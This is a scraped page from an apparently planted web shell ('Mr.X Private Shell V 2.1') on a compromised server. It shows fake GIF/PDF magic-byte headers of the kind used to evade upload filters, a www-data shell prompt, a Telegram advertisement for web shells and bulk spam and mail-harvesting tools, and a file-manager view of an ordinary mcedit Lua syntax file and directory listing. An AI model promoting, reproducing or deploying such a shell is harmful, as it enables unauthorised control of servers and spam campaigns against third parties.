GIF89; GIF89; %PDF- %PDF- Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.129: ~ $
#
# Lua syntax highlighting
#
# History:
#
# - 2015: Support for long strings and long comments.
# - 2011: String-literal fixes.
# - 2005: Started by Mike Gorchak <lestat@i.com.ua>

context default lightgray

# keywords
    keyword whole and white
    keyword whole break white
    keyword whole do white
    keyword whole else white
    keyword whole elseif white
    keyword whole end white
    keyword whole false white
    keyword whole for white
    keyword whole function white
    keyword whole if white
    keyword whole in white
    keyword whole local white
    keyword whole nil white
    keyword whole not white
    keyword whole or white
    keyword whole repeat white
    keyword whole return white
    keyword whole then white
    keyword whole true white
    keyword whole until white
    keyword whole while white

# Comment and string delimiters
    keyword -- brown
    keyword ]\[=\]] brown
    # The following colorizes the start delimiter of "long" strings.
    # The start delimiter of "long" comments isn't affected by the following
    # directive but gets its color from the "--" above (gods know why).
    keyword [\[=\][ brown

# Operators
    keyword ( white
    keyword ) white
    keyword { white
    keyword } white
    keyword [ white
    keyword ] white
    keyword . white
    keyword , white
    keyword ; white
    keyword : white
    keyword .. white
    keyword ... white
    keyword = white
    keyword == white
    keyword ~= white
    keyword <= white
    keyword => white
    keyword > white
    keyword < white
    keyword \+ white
    keyword - white
    keyword \* white
    keyword / white
    keyword ^ white


# Library Functions

    # basiclib
    keyword whole error yellow
    keyword whole getmetatable yellow
    keyword whole setmetatable yellow
    keyword whole getfenv yellow
    keyword whole setfenv yellow
    keyword whole next yellow
    keyword whole ipairs yellow
    keyword whole pairs yellow
    keyword whole print yellow
    keyword whole tonumber yellow
    keyword whole tostring yellow
    keyword whole type yellow
    keyword whole assert yellow
    #keyword whole unpack yellow    # modern code should use table.unpack()
    keyword whole rawequal yellow
    keyword whole rawget yellow
    keyword whole rawset yellow
    keyword whole pcall yellow
    keyword whole xpcall yellow
    keyword whole collectgarbage yellow
    keyword whole gcinfo yellow
    keyword whole loadfile yellow
    keyword whole dofile yellow
    keyword whole loadstring yellow
    keyword whole require yellow
    keyword whole coroutine.create yellow
    keyword whole coroutine.wrap yellow
    keyword whole coroutine.resume yellow
    keyword whole coroutine.yield yellow
    keyword whole coroutine.status yellow

    # stringlib
    keyword whole string.len yellow
    keyword whole string.sub yellow
    keyword whole string.lower yellow
    keyword whole string.upper yellow
    keyword whole string.char yellow
    keyword whole string.rep yellow
    keyword whole string.byte yellow
    keyword whole string.format yellow
    keyword whole string.dump yellow
    keyword whole string.find yellow
    keyword whole string.gfind yellow
    keyword whole string.gsub yellow

    # tablelib
    keyword whole table.concat yellow
    keyword whole table.foreach yellow
    keyword whole table.foreachi yellow
    keyword whole table.getn yellow
    keyword whole table.setn yellow
    keyword whole table.sort yellow
    keyword whole table.insert yellow
    keyword whole table.remove yellow
    keyword whole table.unpack yellow

    # mathlib
    keyword whole math.abs yellow
    keyword whole math.sin yellow
    keyword whole math.cos yellow
    keyword whole math.tan yellow
    keyword whole math.asin yellow
    keyword whole math.acos yellow
    keyword whole math.atan yellow
    keyword whole math.atan2 yellow
    keyword whole math.ceil yellow
    keyword whole math.floor yellow
    keyword whole math.mod yellow
    keyword whole math.frexp yellow
    keyword whole math.ldexp yellow
    keyword whole math.sqrt yellow
    keyword whole math.min yellow
    keyword whole math.max yellow
    keyword whole math.log yellow
    keyword whole math.log10 yellow
    keyword whole math.exp yellow
    keyword whole math.deg yellow
    keyword whole math.pow yellow
    keyword whole math.rad yellow
    keyword whole math.random yellow
    keyword whole math.randomseed yellow

    # iolib
    keyword whole io.input yellow
    keyword whole io.output yellow
    keyword whole io.lines yellow
    keyword whole io.close yellow
    keyword whole io.flush yellow
    keyword whole io.open yellow
    keyword whole io.popen yellow
    keyword whole io.read yellow
    keyword whole io.tmpfile yellow
    keyword whole io.type yellow
    keyword whole io.write yellow

    # filelib
    keyword whole file.flush yellow
    keyword whole file.read yellow
    keyword whole file.lines yellow
    keyword whole file.seek yellow
    keyword whole file.write yellow
    keyword whole file.close yellow
    keyword whole file.__gc yellow
    keyword whole file.__tostring yellow

    # syslib
    keyword whole os.clock yellow
    keyword whole os.date yellow
    keyword whole os.difftime yellow
    keyword whole os.execute yellow
    keyword whole os.exit yellow
    keyword whole os.getenv yellow
    keyword whole os.remove yellow
    keyword whole os.rename yellow
    keyword whole os.setlocale yellow
    keyword whole os.time yellow
    keyword whole os.tmpname yellow

    # debuglib
    keyword whole debug.getlocal yellow
    keyword whole debug.getinfo yellow
    keyword whole debug.gethook yellow
    keyword whole debug.getupvalue yellow
    keyword whole debug.sethook yellow
    keyword whole debug.setlocal yellow
    keyword whole debug.setupvalue yellow
    keyword whole debug.debug yellow
    keyword whole debug.traceback yellow


# Global Variables
    keyword whole _VERSION brightmagenta
    keyword whole _G brightmagenta

#
# Long comments
#

context exclusive --[[ ]] brown
    # hightlights ldoc tags: "@todo", "@param", "@function" etc.
    keyword @\[abcdefghijklmnopqrstuvwxyz\] brightred base
    spellcheck
context exclusive --[=[ ]=] brown
    keyword @\[abcdefghijklmnopqrstuvwxyz\] brightred base
    spellcheck
context exclusive --[==[ ]==] brown
    keyword @\[abcdefghijklmnopqrstuvwxyz\] brightred base
    spellcheck
context exclusive --[===[ ]===] brown
    keyword @\[abcdefghijklmnopqrstuvwxyz\] brightred base
    spellcheck
# 4 equals and up (the number of ='s doesn't have to match, but that's the best we can do):
context exclusive --[====\[=\][ ]====\[=\]] brown
    keyword @\[abcdefghijklmnopqrstuvwxyz\] brightred base
    spellcheck

#
# Long strings
#

context exclusive [[ ]] brightmagenta
    spellcheck
context exclusive [=[ ]=] brightmagenta
    spellcheck
context exclusive [==[ ]==] brightmagenta
    spellcheck
context exclusive [===[ ]===] brightmagenta
    spellcheck
# 4 equals and up (the number of ='s doesn't have to match, but that's the best we can do):
context exclusive [====\[=\][ ]====\[=\]] brightmagenta
    spellcheck


# Simple comments
context exclusive -- \n brown
    keyword @\[abcdefghijklmnopqrstuvwxyz\] brightred base
    spellcheck

# Shebang line
context linestart #! \n brown

# Strings
context " " green
    keyword %a brightgreen
    keyword %c brightgreen
    keyword %d brightgreen
    keyword %l brightgreen
    keyword %p brightgreen
    keyword %q brightgreen
    keyword %s brightgreen
    keyword %u brightgreen
    keyword %w brightgreen
    keyword %x brightgreen
    keyword %z brightgreen
    keyword \\\\ brightgreen
    keyword \\" brightgreen
    keyword \\' brightgreen
    keyword \\\{abtnvfr\} brightgreen
    keyword \\\{0123\}\{01234567\}\{01234567\} brightgreen
    keyword \\\{01234567\}\{01234567\} brightgreen
    keyword \\\{01234567\} brightgreen
    spellcheck

context ' ' green
    keyword %a brightgreen
    keyword %c brightgreen
    keyword %d brightgreen
    keyword %l brightgreen
    keyword %p brightgreen
    keyword %q brightgreen
    keyword %s brightgreen
    keyword %u brightgreen
    keyword %w brightgreen
    keyword %x brightgreen
    keyword %z brightgreen
    keyword \\\\ brightgreen
    keyword \\" brightgreen
    keyword \\' brightgreen
    keyword \\\{abtnvfr\} brightgreen
    keyword \\\{0123\}\{01234567\}\{01234567\} brightgreen
    keyword \\\{01234567\}\{01234567\} brightgreen
    keyword \\\{01234567\} brightgreen
    spellcheck

Filemanager

Name Type Size Permission Actions
PKGBUILD.syntax File 13.28 KB 0644
Syntax File 8.19 KB 0644
ada95.syntax File 3.45 KB 0644
as.syntax File 5.58 KB 0644
aspx.syntax File 1.04 KB 0644
assembler.syntax File 11.86 KB 0644
awk.syntax File 5.63 KB 0644
c.syntax File 3.33 KB 0644
cabal.syntax File 9.53 KB 0644
changelog.syntax File 936 B 0644
cmake.syntax File 32.19 KB 0644
cobol.syntax File 22.08 KB 0644
cs.syntax File 4.43 KB 0644
css.syntax File 19.45 KB 0644
cuda.syntax File 4.6 KB 0644
cxx.syntax File 3.79 KB 0644
cython.syntax File 10.21 KB 0644
d.syntax File 18.04 KB 0644
debian-changelog.syntax File 673 B 0644
debian-control.syntax File 922 B 0644
debian-description.syntax File 473 B 0644
debian-sources-list.syntax File 1.9 KB 0644
diff.syntax File 1.2 KB 0644
dlink.syntax File 8.05 KB 0644
dos.syntax File 2.12 KB 0644
ebuild.syntax File 17.53 KB 0644
eiffel.syntax File 2.92 KB 0644
erlang.syntax File 9.82 KB 0644
f90.syntax File 8.75 KB 0644
filehighlight.syntax File 2.3 KB 0644
fortran.syntax File 8.41 KB 0644
glsl.syntax File 15.25 KB 0644
go.syntax File 5.03 KB 0644
haskell.syntax File 8.49 KB 0644
hive.syntax File 36.63 KB 0644
html.syntax File 35.41 KB 0644
idl.syntax File 3 KB 0644
ini.syntax File 220 B 0644
j.syntax File 1.55 KB 0644
jal.syntax File 10.04 KB 0644
java.syntax File 3.82 KB 0644
js.syntax File 5.7 KB 0644
json.syntax File 1.36 KB 0644
kotlin.syntax File 5.47 KB 0644
latex.syntax File 8.75 KB 0644
lisp.syntax File 2.18 KB 0644
lkr.syntax File 2.06 KB 0644
lsm.syntax File 1.22 KB 0644
lua.syntax File 8.34 KB 0644
m4.syntax File 3.06 KB 0644
mail.syntax File 4.02 KB 0644
makefile.syntax File 2.31 KB 0644
markdown.syntax File 557 B 0644
meson.syntax File 3.27 KB 0644
ml.syntax File 2.57 KB 0644
named.syntax File 6.53 KB 0644
nemerle.syntax File 5.62 KB 0644
nroff.syntax File 7.95 KB 0644
octave.syntax File 10.58 KB 0644
opencl.syntax File 5.61 KB 0644
osl.syntax File 3.97 KB 0644
pascal.syntax File 3.89 KB 0644
perl.syntax File 9.54 KB 0644
php.syntax File 108.91 KB 0644
po.syntax File 2.26 KB 0644
povray.syntax File 8.35 KB 0644
procmail.syntax File 8.1 KB 0644
properties.syntax File 1.6 KB 0644
protobuf.syntax File 1.5 KB 0644
puppet.syntax File 21.55 KB 0644
python.syntax File 9.42 KB 0644
r.syntax File 4.33 KB 0644
ruby.syntax File 5.97 KB 0644
rust.syntax File 4.43 KB 0644
sh.syntax File 64.49 KB 0644
slang.syntax File 3.35 KB 0644
smalltalk.syntax File 5.15 KB 0644
spec.syntax File 11.65 KB 0644
sql.syntax File 10.64 KB 0644
strace.syntax File 1.05 KB 0644
swift.syntax File 6.29 KB 0644
swig.syntax File 5.43 KB 0644
syntax.syntax File 2.1 KB 0644
tcl.syntax File 4.32 KB 0644
texinfo.syntax File 8.87 KB 0644
ts.syntax File 6.31 KB 0644
tt.syntax File 3.55 KB 0644
unknown.syntax File 31 B 0644
verilog.syntax File 20.06 KB 0644
vhdl.syntax File 5.01 KB 0644
xml.syntax File 1.12 KB 0644
yabasic.syntax File 5.31 KB 0644
yaml.syntax File 1.34 KB 0644
yum-repo.syntax File 353 B 0644
yxx.syntax File 6.42 KB 0644